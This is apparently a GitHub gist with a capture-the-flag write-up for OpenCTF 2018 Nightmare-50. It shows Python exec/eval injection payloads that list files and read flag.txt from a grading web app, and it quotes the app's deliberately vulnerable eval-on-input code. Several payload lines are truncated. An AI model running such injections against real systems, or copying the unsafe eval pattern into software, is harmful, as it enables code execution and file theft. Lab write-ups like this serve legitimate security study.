Skip to content

Instantly share code, notes, and snippets.

Last active September 3, 2018 21:20
What would you like to do?
OpenCTF 2018: Challenge 24 (Nightmare-50)

OpenCTF 2018: Challenge 24 (Nightmare-50)

Challenge text:

Nightmare-50 50 ---
Automated home work scoring my ass. 

This website hosts a 'homework grading' application as an Xterm.js/Gotty webapp:

Welcome to Doctor Professor Wilson's Python 101!
Lesson 1: hello world
Enter homework for grading:

Here we can enter a single line of Python code which turns out to be evaled. We'll first want to explore the filesystem. Because we can only use a single line and Python doesn't support multiple statements on a single line, we have to resort to some trickery with exec:

exec("import os;\nprint(os.listdir('.'))")

This gives us:

['lib64', 'lib', 'sys', 'mnt', 'home', 'bin', 'var', 'usr', 'tmp', 'media', 'proc', 'boot', 'sbin', 'dev', 'run', 'opt', 'etc', 'root', 'srv', '.dockerenv', '', 'requirements.txt', 'flag.txt', '']

We assume the flag is in flag.txt and read this:

exec("with open('flag.txt', 'r') as f:\n    print(")

And this returns the flag: ThisIsAVeryFl@ggyFlag

As a bonus, we can also extract the contents of

exec("with open('', 'r') as f:\n    print(")

import sys
# no traceback
sys.tracebacklimit = 0
env=dict(locals=None,globals=None, __name__=None,print=print,__file__=None)
print("Welcome to Doctor Professor Wilson's Python 101!")
print("Lesson 1: hello world")
inject = input("Enter homework for grading:\n")
eval(inject, env)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment